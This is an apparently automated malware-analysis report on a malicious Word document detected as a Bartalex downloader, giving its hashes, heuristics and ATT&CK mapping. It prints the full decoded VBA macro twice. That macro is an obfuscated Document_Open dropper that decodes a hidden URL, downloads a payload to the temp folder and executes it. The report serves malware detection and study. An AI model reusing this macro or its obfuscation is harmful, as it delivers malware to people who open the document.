Office (OLE) malware analysis — malicious · 09fec43d778fb7bb

MALICIOUS

Office (OLE)

56.0 KB Created: 2015-06-23 04:55:00 Authoring application: Microsoft Office Word First seen: 2015-09-17

MD5: 1fa461df570ba21920634f377519c170 SHA-1: f901243faaed3f65a63c6356e73f7683e0b21093 SHA-256: 09fec43d778fb7bb24f2a9953214cb64373c77c9c90f018eced5f8b246692787

258 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains VBA macros that leverage the URLDownloadToFile API to download a second-stage payload. The presence of the URLDownloadToFile API and the 'OLE_VBA_DOWNLOAD' heuristic strongly indicate this malicious behavior. The ClamAV detection 'Doc.Downloader.Bartalex-6755229-0' further supports the classification as a downloader.

Heuristics 8

ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA

Matched line in script

Private Declare PtrSafe Function æâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçé Lib "urlmon" Alias "URLDownloadToFileA" (ByVal âîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæè As Long, ByVal êôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâë As String, ByVal àâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæë …

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

æâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçé 0, éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ("Ü¼Íwá¶»€Þ³Ø¼Çª’ÄÂˆÞ·Às×ÀØ©¾Ü´®´ÈÁ¹¾ÈÇè·ååÜsv�âç·´", "wDhItJNQHhJpYUIeTKYjRRErRoBPwOAEeSPJcYvRqwsDGVrsCLGkASnGAqVffdiTMTyKKZehYxMFpWZuWbpzUiUHjEDgNfQUuUgZ"), Environ("temp") & éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ("Ü¼Íw¦}Æº®à°×É¾", …

Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12013 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12013 bytes
SHA-256: `cd6bbf65d9ad6ae73d6847bc70e5034062112975a2ee65e86052735882cd3816`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare PtrSafe Function œôæïàüûàèîâûàêèüÿïÿâçàîûûœüèëîæêêœûûôæëèàôôâôœàÿîüèèüàéûçûéîâîûœâœçüâçæèôÿâæéœôçéüàêïèÿüüûÿîœüçœœàûü Lib "shell32.dll" Alias "ShellExecuteA" (ByVal ççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéè As Long, ByVal üîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïû As String, ByVal ûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüï As String, ByVal œüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïè As String, ByVal âœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëë As String, ByVal ôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿ As Long) As Long Private Declare PtrSafe Function æâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçé Lib "urlmon" Alias "URLDownloadToFileA" (ByVal âîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæè As Long, ByVal êôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâë As String, ByVal àâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâô As String, ByVal ÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôê As Long, ByVal ÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèç As Long) As Long Private Sub àüôâüôÿæûûîèüéïûêœëîâüûôààêûèêèïîÿèèïœîçëüéîëéÿâââæüœüëôôàâæÿëœîéÿàêÿàéëüæüîæîïæœâûüêüæàèéœæîëêîÿçôê() æâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçé 0, éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ("Ü¼Íwá¶»€Þ³Ø¼Çª’ÄÂˆÞ·Às×ÀØ©¾Ü´®´ÈÁ¹¾ÈÇè·ååÜsv�âç·´", "wDhItJNQHhJpYUIeTKYjRRErRoBPwOAEeSPJcYvRqwsDGVrsCLGkASnGAqVffdiTMTyKKZehYxMFpWZuWbpzUiUHjEDgNfQUuUgZ"), Environ("temp") & éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ("Ü¼Íw¦}Æº®à°×É¾", "wDhItJNQHhJpYUIeTKYjRRErRoBPwOAEeSPJcYvRqwsDGVrsCLGkASnGAqVffdiTMTyKKZehYxMFpWZuWbpzUiUHjEDgNfQUuUgZ"), 0, 0 œôæïàüûàèîâûàêèüÿïÿâçàîûûœüèëîæêêœûûôæëèàôôâôœàÿîüèèüàéûçûéîâîûœâœçüâçæèôÿâæéœôçéüàêïèÿüüûÿîœüçœœàûü 0, "open", Environ$("tmp") & éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ("Ü¼Íw¦}Æº®à°×É¾", "wDhItJNQHhJpYUIeTKYjRRErRoBPwOAEeSPJcYvRqwsDGVrsCLGkASnGAqVffdiTMTyKKZehYxMFpWZuWbpzUiUHjEDgNfQUuUgZ"), "", vbNullString, vbNormalFocus End Sub Private Sub Document_Open() àüôâüôÿæûûîèüéïûêœëîâüûôààêûèêèïîÿèèïœîçëüéîëéÿâââæüœüëôôàâæÿëœîéÿàêÿàéëüæüîæîïæœâûüêüæàèéœæîëêîÿçôê End Sub Function éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ(éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï, ïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîô) Dim æôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæ, âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî, âçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûô, êàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûû, àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé æôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæ = Len(ïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîô) âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî = 1 âçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûô = Len(éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï) éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï = StrReverse(éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï) For êàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûû = âçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûô To 1 Step -1 àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé = àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé & Chr(Asc(Mid(éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï, êàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûû, 1)) - Asc(Mid(ïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîô, âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî, 1))) âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî = âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî + 1 If âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî > æôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæ Then âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî = 1 Next àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé = StrReverse(àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé) éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ = àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé End Function Attribute VB_Name = "NewMacros" Sub dfghj() ' ' dfghj Macro ' ' End Sub

SHA-256: cd6bbf65d9ad6ae73d6847bc70e5034062112975a2ee65e86052735882cd3816

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function œôæïàüûàèîâûàêèüÿïÿâçàîûûœüèëîæêêœûûôæëèàôôâôœàÿîüèèüàéûçûéîâîûœâœçüâçæèôÿâæéœôçéüàêïèÿüüûÿîœüçœœàûü Lib "shell32.dll" Alias "ShellExecuteA" (ByVal ççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéè As Long, ByVal üîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïû As String, ByVal ûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüï As String, ByVal œüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïè As String, ByVal âœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëë As String, ByVal ôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿ As Long) As Long
Private Declare PtrSafe Function æâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçé Lib "urlmon" Alias "URLDownloadToFileA" (ByVal âîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæè As Long, ByVal êôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâë As String, ByVal àâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâô As String, ByVal ÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôê As Long, ByVal ÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèç As Long) As Long
Private Sub àüôâüôÿæûûîèüéïûêœëîâüûôààêûèêèïîÿèèïœîçëüéîëéÿâââæüœüëôôàâæÿëœîéÿàêÿàéëüæüîæîïæœâûüêüæàèéœæîëêîÿçôê()
æâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçé 0, éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ("Ü¼Íwá¶»€Þ³Ø¼Çª’ÄÂˆÞ·Às×ÀØ©¾Ü´®´ÈÁ¹¾ÈÇè·ååÜsv�âç·´", "wDhItJNQHhJpYUIeTKYjRRErRoBPwOAEeSPJcYvRqwsDGVrsCLGkASnGAqVffdiTMTyKKZehYxMFpWZuWbpzUiUHjEDgNfQUuUgZ"), Environ("temp") & éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ("Ü¼Íw¦}Æº®à°×É¾", "wDhItJNQHhJpYUIeTKYjRRErRoBPwOAEeSPJcYvRqwsDGVrsCLGkASnGAqVffdiTMTyKKZehYxMFpWZuWbpzUiUHjEDgNfQUuUgZ"), 0, 0
œôæïàüûàèîâûàêèüÿïÿâçàîûûœüèëîæêêœûûôæëèàôôâôœàÿîüèèüàéûçûéîâîûœâœçüâçæèôÿâæéœôçéüàêïèÿüüûÿîœüçœœàûü 0, "open", Environ$("tmp") & éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ("Ü¼Íw¦}Æº®à°×É¾", "wDhItJNQHhJpYUIeTKYjRRErRoBPwOAEeSPJcYvRqwsDGVrsCLGkASnGAqVffdiTMTyKKZehYxMFpWZuWbpzUiUHjEDgNfQUuUgZ"), "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()

àüôâüôÿæûûîèüéïûêœëîâüûôààêûèêèïîÿèèïœîçëüéîëéÿâââæüœüëôôàâæÿëœîéÿàêÿàéëüæüîæîïæœâûüêüæàèéœæîëêîÿçôê
End Sub
Function éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ(éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï, ïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîô)
 Dim æôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæ, âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî, âçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûô, êàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûû, àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé
 æôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæ = Len(ïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîô)
 âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî = 1
 âçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûô = Len(éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï)
éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï = StrReverse(éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï)
 For êàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûû = âçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûô To 1 Step -1
      àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé = àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé & Chr(Asc(Mid(éêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîï, êàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæâêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûû, 1)) - Asc(Mid(ïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîô, âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî, 1)))
      âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî = âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî + 1
      If âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî > æôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœéêôçïæîàëàçâêæïçëïëôàèëëôæàîîéêœüôèçççéàæéîæ Then âêçéâîæœôèæïèæêîééàâïœÿïüëÿéïééæëêüïœüûàèèûûàëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçî = 1
      Next
      àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé = StrReverse(àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé)
      éîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâéôÿôêÿèèüïüîôæôüœæâëÿêéæêœàêçèûœéèÿèêîêàæçæéôûÿïûûâæçâïûôêàâëàâèéàçœœ = àëâôÿîôâçàîïïïîèçèÿêæëïîêüëâœôêûôëœÿîîèâîâéïçïéèüîïëûœçîâçæèêôâæèëêÿéîàêéâôüüûÿîëôçëëœüüœçïèâœœæôûâé
End Function

Attribute VB_Name = "NewMacros"
Sub dfghj()
'
' dfghj Macro
'
'

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.